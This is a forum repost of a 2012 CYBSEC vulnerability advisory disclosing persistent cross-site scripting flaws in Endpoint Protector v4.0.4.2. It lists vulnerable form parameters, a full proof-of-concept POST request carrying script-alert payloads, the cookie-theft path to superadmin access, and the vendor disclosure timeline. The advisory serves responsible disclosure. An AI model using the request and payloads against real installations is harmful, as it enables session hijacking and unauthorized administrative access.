hathat Posted November 4, 2012 Report Posted November 4, 2012 Endpoint Protector v4.0.4.2 Multiple Persistent XSSAdvisory Name: Multiple Persistent Cross-Site Scripting (XSS) in EndpointProtectorInternal Cybsec Advisory Id: 2012-1029-Multiple Persistent XSS in EndpointProtectorVulnerability Class: Permanent Cross-Site Scripting (XSS)Release Date: 10/29/2012Affected Applications: Endpoint Protector v4.0.4.2; other versions mayalso be affected.Affected Platforms: Any running Endpoint Protector v4.0.4.2Local / Remote: RemoteSeverity: High ? CVSS: 5.8 (AV:N/AC:M/Au:NR/C:N/I:P/A:P)Researcher: Juan Manuel GarciaVendor Status: Acknowedged / UnpatchedReference to Vulnerability Disclosure Policy:http://www.cybsec.com/vulnerability_policy.pdfVulnerability Description:Multiple Persistent Cross-Site vulnerabilities were found in Endpoint Protector v4.0.4.2 [VirtualAppliance], because the application fails to sanitize the response before it is returned to the user.This can be exploited to execute arbitrary script and HTML code in a user's browser session. This mayallow the attacker to steal the user's cookie and to launch further attacks.The parameters "client_device[name]" and "client_device[description]" in /index.php/clientdevice/create are not properly sanitized.The parameters "client_machine[name]", "client_machine[domain]","client_machine[workgroup]" and "client_machine[location]" in /index.php/clientmachine/create are not properly sanitized.The parameter "group[name]" in /index.php/mgroup/create is not properly sanitized.Other parameters might also be affected.Proof of Concept:* The parameter "client_device[name]" in the POST request has been set to:<script>alert(document.cookie)</script>* The parameter "client_device[description]" in the POST request has beenset to:<script>alert(1)</script>POST /index.php/clientdevice/create HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)Gecko/20100101 Firefox/11.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveReferer: https://xxx.xxx.xxx.xxx/index.php/Cookie: place=clientdevice; mark=clientdevice;ratool=d4d3242c4444254d035b7f797738837eContent-Type: multipart/form-data; boundary=---------------------------17723440641777718806882422624Content-Length: 1131-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="id"-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="client_device[department_id]"1-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="client_device[device_type_id]"1-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="client_device[name]"<script>alert(document.cookie)</script>-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="client_device[description]"<script>alert(1)</script>-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="client_device[vid]"-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="client_device[pid]"-----------------------------17723440641777718806882422624Content-Disposition: form-data; name="client_device[serialno]"-----------------------------17723440641777718806882422624--Impact:An affected user may unintentionally execute scripts or actions written byan attacker. In addition, anattacker may obtain authorization cookies that would allow him to gainunauthorized access to theapplication.In this particular case, any user with permission to access theadministration console could gain "superadmin" privileges by stealing the session cookie of another user with thispermission.Vendor Response:2012/03/27 - Vulnerability was identified2012/03/29 - Cybsec sent detailed information on the issue and a Proof ofConcept to the vendor2012/04/04 - Vendor confirmed vulnerability (Request ID - 10006599) andstated ?The problemsencountered do not represent a significant threat for customers using itbecause it is usually done withno Internet connection?2012/04/05 - Vendor stated ?we planned an official release of the newpatch to include all the fixes formentioned vulnerabilities for the date of 18 of September 2012?2012/09/25 ? Cybsec asked the vendor if the update had been released onthe planed date2012/09/26 ? Vendor stated that he would check the status of the report[Ticket#2012092510000057]2012/10/03 ? Vendor gave us a new deadline: up to 3-4 months.2012/10/24 ? Vendor asked if we had published the security advisory2012/10/24 ? Cybsec stated that the security advisory was going to bepublished on October 292012/10/29 ? Vulnerability was releasedContact Information:For more information regarding the vulnerability feel free to contact theresearcher atjmgarcia <at> cybsec <dot> comAbout CYBSEC S.A. Security SystemsSince 1996, CYBSEC is engaged exclusively in rendering professionalservices specialized inInformation Security. Their area of services covers Latin America, Spainand over 250 customers are aproof of their professional life.To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor isassociated with othersoftware and/or hardware provider companies.Our services are strictly focused on Information Security, protecting ourclients from emerging securitythreats, maintaining their IT deployments available, safe, and reliable.Beyond professional services, CYBSEC is continuously researching newdefense and attack techniquesand contributing with the security community with high quality informationexchange.For more information, please visit www.cybsec.com(c) 2010 - CYBSEC S.A. Security SystemsSursa Endpoint Protector v4.0.4.2 Multiple Persistent XSS Quote